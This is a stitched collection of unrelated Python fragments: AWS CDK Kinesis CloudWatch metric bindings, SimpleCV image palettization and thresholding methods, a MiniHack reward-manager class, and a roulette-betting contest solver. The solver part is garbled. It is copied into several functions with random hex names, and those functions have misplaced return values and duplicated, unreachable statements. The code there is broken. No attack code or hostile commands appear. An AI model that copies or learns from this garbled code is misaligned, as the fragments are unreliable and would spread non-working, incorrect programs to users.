:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
'''
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
dimensions_map=dimensions_map,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return typing.cast(aws_cdk.aws_cloudwatch.Metric, jsii.invoke(self, "metricIncomingRecords", [props]))
@jsii.member(jsii_name="metricPutRecordBytes")
def metric_put_record_bytes(
self,
*,
account: typing.Optional[builtins.str] = None,
color: typing.Optional[builtins.str] = None,
dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
label: typing.Optional[builtins.str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[builtins.str] = None,
statistic: typing.Optional[builtins.str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
'''The number of bytes put to the Kinesis stream using the PutRecord operation over the specified time period.
The metric defaults to average over 5 minutes, it can be changed by passing ``statistic`` and ``period`` properties.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: (deprecated) Dimensions of the metric. Default: - No dimensions.
:param dimensions_map: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
'''
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
dimensions_map=dimensions_map,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return typing.cast(aws_cdk.aws_cloudwatch.Metric, jsii.invoke(self, "metricPutRecordBytes", [props]))
@jsii.member(jsii_name="metricPutRecordLatency")
def metric_put_record_latency(
self,
*,
account: typing.Optional[builtins.str] = None,
color: typing.Optional[builtins.str] = None,
dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
label: typing.Optional[builtins.str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[builtins.str] = None,
statistic: typing.Optional[builtins.str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
'''The time taken per PutRecord operation, measured over the specified time period.
The metric defaults to average over 5 minutes, it can be changed by passing ``statistic`` and ``period`` properties.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: (deprecated) Dimensions of the metric. Default: - No dimensions.
:param dimensions_map: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
'''
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
dimensions_map=dimensions_map,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return typing.cast(aws_cdk.aws_cloudwatch.Metric, jsii.invoke(self, "metricPutRecordLatency", [props]))
@jsii.member(jsii_name="metricPutRecordsBytes")
def metric_put_records_bytes(
self,
*,
account: typing.Optional[builtins.str] = None,
color: typing.Optional[builtins.str] = None,
dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
label: typing.Optional[builtins.str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[builtins.str] = None,
statistic: typing.Optional[builtins.str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
'''The number of bytes put to the Kinesis stream using the PutRecords operation over the specified time period.
The metric defaults to average over 5 minutes, it can be changed by passing ``statistic`` and ``period`` properties.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: (deprecated) Dimensions of the metric. Default: - No dimensions.
:param dimensions_map: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
'''
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
dimensions_map=dimensions_map,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return typing.cast(aws_cdk.aws_cloudwatch.Metric, jsii.invoke(self, "metricPutRecordsBytes", [props]))
@jsii.member(jsii_name="metricPutRecordsFailedRecords")
def metric_put_records_failed_records(
self,
*,
account: typing.Optional[builtins.str] = None,
color: typing.Optional[builtins.str] = None,
dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
label: typing.Optional[builtins.str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[builtins.str] = None,
statistic: typing.Optional[builtins.str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
'''The number of records rejected due to internal failures in a PutRecords operation per Kinesis data stream, measured over the specified time period.
Occasional internal failures are to be expected and should be retried.
The metric defaults to average over 5 minutes, it can be changed by passing ``statistic`` and ``period`` properties.
:param account: Account which this metric comes from. Default: - Deployment account.
| |
roi = (0,int(idxL),size[0],int(idxH-idxL))
cv.SetImageROI(pal,roi)
color = np.array((float(self._mPalette[i][2]),float(self._mPalette[i][1]),float(self._mPalette[i][0])))
cv.AddS(pal,color,pal)
cv.ResetImageROI(pal)
idxL = idxH
retVal = Image(pal)
else: # do hue
if( horizontal ):
if( size[0] == -1 or size[1] == -1 ):
size = (int(self.width),int(self.height*.1))
pal = cv.CreateImage(size, cv.IPL_DEPTH_8U, 1)
cv.Zero(pal)
idxL = 0
idxH = 0
for i in range(0,bins):
idxH =np.clip(idxH+(self._mPalettePercentages[i]*float(size[0])),0,size[0]-1)
roi = (int(idxL),0,int(idxH-idxL),size[1])
cv.SetImageROI(pal,roi)
cv.AddS(pal,float(self._mPalette[i]),pal)
cv.ResetImageROI(pal)
idxL = idxH
retVal = Image(pal)
else:
if( size[0] == -1 or size[1] == -1 ):
size = (int(self.width*.1),int(self.height))
pal = cv.CreateImage(size, cv.IPL_DEPTH_8U, 1)
cv.Zero(pal)
idxL = 0
idxH = 0
for i in range(0,bins):
idxH =np.clip(idxH+self._mPalettePercentages[i]*size[1],0,size[1]-1)
roi = (0,int(idxL),size[0],int(idxH-idxL))
cv.SetImageROI(pal,roi)
cv.AddS(pal,float(self._mPalette[i]),pal)
cv.ResetImageROI(pal)
idxL = idxH
retVal = Image(pal)
return retVal
def palettize(self,bins=10,hue=False):
"""
**SUMMARY**
This method analyzes an image and determines the most common colors using a k-means algorithm.
The method then goes through and replaces each pixel with the centroid of the clutsters found
by k-means. This reduces the number of colors in an image to the number of bins. This can be particularly
handy for doing segementation based on color.
**PARAMETERS**
* *bins* - an integer number of bins into which to divide the colors in the image.
* *hue* - if hue is true we do only cluster on the image hue values.
**RETURNS**
An image matching the original where each color is replaced with its palette value.
**EXAMPLE**
>>> img2 = img1.palettize()
>>> img2.show()
**NOTES**
The hue calculations should be siginificantly faster than the generic RGB calculation as
it works in a one dimensional space. Sometimes the underlying scipy method freaks out
about k-means initialization with the following warning:
.. Warning::
UserWarning: One of the clusters is empty. Re-run kmean with a different initialization.
This shouldn't be a real problem.
**SEE ALSO**
:py:meth:`rePalette`
:py:meth:`drawPaletteColors`
:py:meth:`palettize`
:py:meth:`getPalette`
:py:meth:`binarizeFromPalette`
:py:meth:`findBlobsFromPalette`
"""
retVal = None
self._generatePalette(bins,hue)
if( hue ):
derp = self._mPalette[self._mPaletteMembers]
retVal = Image(derp[::-1].reshape(self.height,self.width)[::-1])
retVal = retVal.rotate(-90,fixed=False)
else:
retVal = Image(self._mPalette[self._mPaletteMembers].reshape(self.width,self.height,3))
return retVal
def findBlobsFromPalette(self, palette_selection, dilate = 0, minsize=5, maxsize=0,appx_level=3):
"""
**SUMMARY**
This method attempts to use palettization to do segmentation and behaves similar to the
findBlobs blob in that it returs a feature set of blob objects. Once a palette has been
extracted using getPalette() we can then select colors from that palette to be labeled
white within our blobs.
**PARAMETERS**
* *palette_selection* - color triplets selected from our palette that will serve turned into blobs
These values can either be a 3xN numpy array, or a list of RGB triplets.
* *dilate* - the optional number of dilation operations to perform on the binary image
prior to performing blob extraction.
* *minsize* - the minimum blob size in pixels
* *maxsize* - the maximim blob size in pixels.
* *appx_level* - The blob approximation level - an integer for the maximum distance between the true edge and the
approximation edge - lower numbers yield better approximation.
**RETURNS**
If the method executes successfully a FeatureSet of Blobs is returned from the image. If the method
fails a value of None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> p = img.getPalette()
>>> blobs = img.findBlobsFromPalette( (p[0],p[1],[6]) )
>>> blobs.draw()
>>> img.show()
**SEE ALSO**
:py:meth:`rePalette`
:py:meth:`drawPaletteColors`
:py:meth:`palettize`
:py:meth:`getPalette`
:py:meth:`binarizeFromPalette`
:py:meth:`findBlobsFromPalette`
"""
#we get the palette from find palete
#ASSUME: GET PALLETE WAS CALLED!
bwimg = self.binarizeFromPalette(palette_selection)
if( dilate > 0 ):
bwimg =bwimg.dilate(dilate)
if (maxsize == 0):
maxsize = self.width * self.height
#create a single channel image, thresholded to parameters
blobmaker = BlobMaker()
blobs = blobmaker.extractFromBinary(bwimg,
self, minsize = minsize, maxsize = maxsize,appx_level=appx_level)
if not len(blobs):
return None
return blobs
def binarizeFromPalette(self, palette_selection):
"""
**SUMMARY**
This method uses the color palette to generate a binary (black and white) image. Palaette selection
is a list of color tuples retrieved from img.getPalette(). The provided values will be drawn white
while other values will be black.
**PARAMETERS**
palette_selection - color triplets selected from our palette that will serve turned into blobs
These values can either be a 3xN numpy array, or a list of RGB triplets.
**RETURNS**
This method returns a black and white images, where colors that are close to the colors
in palette_selection are set to white
**EXAMPLE**
>>> img = Image("lenna")
>>> p = img.getPalette()
>>> b = img.binarizeFromPalette( (p[0],p[1],[6]) )
>>> b.show()
**SEE ALSO**
:py:meth:`rePalette`
:py:meth:`drawPaletteColors`
:py:meth:`palettize`
:py:meth:`getPalette`
:py:meth:`binarizeFromPalette`
:py:meth:`findBlobsFromPalette`
"""
#we get the palette from find palete
#ASSUME: GET PALLETE WAS CALLED!
if( self._mPalette == None ):
logger.warning("Image.binarizeFromPalette: No palette exists, call getPalette())")
return None
retVal = None
img = self.palettize(self._mPaletteBins, hue=self._mDoHuePalette)
if( not self._mDoHuePalette ):
npimg = img.getNumpy()
white = np.array([255,255,255])
black = np.array([0,0,0])
for p in palette_selection:
npimg = np.where(npimg != p,npimg,white)
npimg = np.where(npimg != white,black,white)
retVal = Image(npimg)
else:
npimg = img.getNumpy()[:,:,1]
white = np.array([255])
black = np.array([0])
for p in palette_selection:
npimg = np.where(npimg != p,npimg,white)
npimg = np.where(npimg != white,black,white)
retVal = Image(npimg)
return retVal
def skeletonize(self, radius = 5):
"""
**SUMMARY**
Skeletonization is the process of taking in a set of blobs (here blobs are white
on a black background) and finding a squigly line that would be the back bone of
the blobs were they some sort of vertebrate animal. Another way of thinking about
skeletonization is that it finds a series of lines that approximates a blob's shape.
A good summary can be found here:
http://www.inf.u-szeged.hu/~palagyi/skel/skel.html
**PARAMETERS**
* *radius* - an intenger that defines how roughly how wide a blob must be to be added
to the skeleton, lower values give more skeleton lines, higher values give
fewer skeleton lines.
**EXAMPLE**
>>> cam = Camera()
>>> while True:
>>> img = cam.getImage()
>>> b = img.binarize().invert()
>>> s = img.skeletonize()
>>> r = b-s
>>> r.show()
**NOTES**
This code was a suggested improvement by <NAME>, check out his awesome blog here:
http://alexbw.posterous.com/
"""
img = self.toGray().getNumpy()[:,:,0]
distance_img = ndimage.distance_transform_edt(img)
morph_laplace_img = ndimage.morphological_laplace(distance_img, (radius, radius))
skeleton = morph_laplace_img < morph_laplace_img.min()/2
retVal = np.zeros([self.width,self.height])
retVal[skeleton] = 255
return Image(retVal)
def smartThreshold(self, mask=None, rect=None):
"""
**SUMMARY**
smartThreshold uses a method called grabCut, also called graph cut, to
automagically generate a grayscale mask image. The dumb version of threshold
just uses color, smartThreshold looks at
both color and edges to find a blob. To work smartThreshold needs either a
rectangle that bounds the object you want to find, or a mask. If you use
a rectangle make sure it holds the complete object. In the case of a mask, it
need not be a normal binary mask, it can have the normal white foreground and black
background, but also a light and dark gray values that correspond to areas
that are more likely to be foreground and more likely to be background. These
values can be found in the color class as Color.BACKGROUND, Color.FOREGROUND,
Color.MAYBE_BACKGROUND, and Color.MAYBE_FOREGROUND.
**PARAMETERS**
* *mask* - A grayscale mask the same size as the image using the 4 mask color values
* *rect* - A rectangle tuple of the form (x_position,y_position,width,height)
**RETURNS**
A grayscale image with the foreground / background values assigned to:
* BACKGROUND = (0,0,0)
* MAYBE_BACKGROUND = (64,64,64)
* MAYBE_FOREGROUND = (192,192,192)
* FOREGROUND = (255,255,255)
**EXAMPLE**
>>> img = Image("RatTop.png")
>>> mask = Image((img.width,img.height))
>>> mask.dl().circle((100,100),80,color=Color.MAYBE_BACKGROUND,filled=True)
>>> mask.dl().circle((100,100),60,color=Color.MAYBE_FOREGROUND,filled=True)
>>> mask.dl().circle((100,100),40,color=Color.FOREGROUND,filled=True)
>>> mask = mask.applyLayers()
>>> new_mask = img.smartThreshold(mask=mask)
>>> new_mask.show()
**NOTES**
http://en.wikipedia.org/wiki/Graph_cuts_in_computer_vision
**SEE ALSO**
:py:meth:`smartFindBlobs`
"""
try:
import cv2
except:
logger.warning("Can't Do GrabCut without OpenCV >= 2.3.0")
return
retVal = []
if( mask is not None ):
bmp = mask._getGrayscaleBitmap()
# translate the human readable images | |
event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
msgs = [
f"This {name} is delicious",
"Blecch! Rotten food!",
"last bite of your meal",
]
if name == "apple":
msgs.append("Delicious! Must be a Macintosh!")
msgs.append("Core dumped.")
if name == "pear":
msgs.append("Core dumped.")
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_wield_event(
self,
name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when a specific weapon is wielded.
Args:
name (str):
The name of the weapon to be wielded.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
msgs = [
f"{name} wields itself to your hand!",
f"{name} (weapon in hand)",
]
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_wear_event(
self,
name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when a specific armor is worn.
Args:
name (str):
The name of the armor to be worn.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
msgs = [f"You are now wearing a {name}"]
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_amulet_event(
self,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when an amulet is worn.
Args:
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_message_event(
["amulet (being worn)."],
reward,
repeatable,
terminal_required,
terminal_sufficient,
)
def add_kill_event(
self,
name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when a specified monster is killed.
Args:
name (str):
The name of the monster to be killed.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_message_event(
[f"You kill the {name}"],
reward,
repeatable,
terminal_required,
terminal_sufficient,
)
def add_message_event(
self,
msgs: List[str],
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when any of the given messages are seen.
Args:
msgs (List[str]):
The name of the monster to be killed.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_positional_event(
self,
place_name: str,
action_name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered on taking a given action at a given place.
Args:
place_name (str):
The name of the place to trigger the event.
action_name (int):
The name of the action to trigger the event.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_loc_action_event(
place_name,
action_name,
reward,
repeatable,
terminal_required,
terminal_sufficient,
)
def add_coordinate_event(
self,
coordinates: Tuple[int, int],
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered on when reaching the specified
coordinates.
Args:
coordinates (Tuple[int, int]):
The coordinates to be reached (tuple of ints).
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self.add_event(
CoordEvent(
reward,
repeatable,
terminal_required,
terminal_sufficient,
coordinates=coordinates,
)
)
def add_location_event(
self,
location: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered on reaching a specified location.
Args:
name (str):
The name of the location to be reached.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self.add_event(
LocEvent(
reward,
repeatable,
terminal_required,
terminal_sufficient,
loc=location,
)
)
def _set_achieved(self, event: Event) -> float:
if not event.repeatable:
event.achieved = True
return event.reward
def _standing_on_top(self, env, name):
"""Returns whether the agents is standing on top of the given object.
The object name (e.g. altar, sink, fountain) must exist on the map.
Args:
env (MiniHack):
The environment object.
name (str):
The name of the object.
Returns:
bool: True if the object name is not in the screen descriptions
with agent info taking the space of the corresponding tile rather
than the object).
"""
return not env.screen_contains(name)
def check_episode_end_call(
self, env, previous_observation, action, observation
) -> bool:
reward = 0.0
for event in self.events:
if event.achieved:
continue
reward += event.check(
env, previous_observation, action, observation
)
for custom_reward_function in self.custom_reward_functions:
reward += custom_reward_function(
env, previous_observation, action, observation
)
self._reward += reward
return self._check_complete()
def _check_complete(self) -> bool:
"""Checks whether the episode is complete.
Requires any event which is sufficient to be achieved, OR all required
events to be achieved."""
result = True
for event in self.events:
# This event is enough, we're done
if event.achieved and event.terminal_sufficient:
return True
# We need this event and we haven't done it, we're not done
if not event.achieved and event.terminal_required:
result = False
# We've achieved all terminal_required events, we're done
return result
def collect_reward(self) -> float:
result = self._reward
self._reward = 0.0
return result
def reset(self):
self._reward = 0.0
for event in self.events:
event.reset()
class SequentialRewardManager(RewardManager):
"""A reward manager that ignores ``terminal_required`` and
``terminal_sufficient``, and just require every event is completed in the
order it is added to the reward manager.
"""
def __init__(self):
self.current_event_idx = 0
super().__init__()
def check_episode_end_call(
self, env, previous_observation, action, observation
):
event = self.events[self.current_event_idx]
reward = event.check(env, previous_observation, action, observation)
if event.achieved:
self.current_event_idx += 1
self._reward += reward
return self._check_complete()
def _check_complete(self) -> bool:
return self.current_event_idx == len(self.events)
class GroupedRewardManager(AbstractRewardManager):
"""Operates as a collection of reward managers.
The rewards from each reward manager are summed, and termination can be
specified by ``terminal_sufficient`` and ``terminal_required`` on each
reward manager.
Given this can be nested arbitrarily deeply (as each reward manager could
itself be a GroupedRewardManager), this enables complex specification of
groups of rewards.
"""
def __init__(self):
self.reward_managers: List[AbstractRewardManager] = []
def check_episode_end_call(
self, env, previous_observation, action, observation
) -> bool:
for reward_manager in self.reward_managers:
result = reward_manager.check_episode_end_call(
env, previous_observation, action, observation
)
# This reward manager has completed and it's sufficient so we're
# done
if reward_manager.terminal_sufficient and result:
return True
# This reward manager is required and hasn't completed, so we're
# not done
if reward_manager.terminal_required and not result:
return False
# If we've got here we've completed all required reward managers, so
# we're done
return True
def add_reward_manager(
self,
reward_manager: AbstractRewardManager,
terminal_required: bool,
terminal_sufficient: bool,
) -> None:
"""Add a new reward manager, with ``terminal_sufficient`` and
``terminal_required`` acting as for individual events.
Args:
reward_manager (RewardManager):
The reward manager to be added.
terminal_required (bool):
Whether this reward manager terminating is required for the
episode | |
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
return p
def func_dc7bcd5d80cc4af98632f43ef09dcd18(infile):
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
return queue
def func_ab93cf4a44ed406ea499c1ba4c14cd16(infile):
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
return placed
def func_1d1c96d70cf24a139b15eb47c24fc305(cases, infile):
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
return ret
def func_aba2540eefae4bc0839f907579e112a2(cases, infile):
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
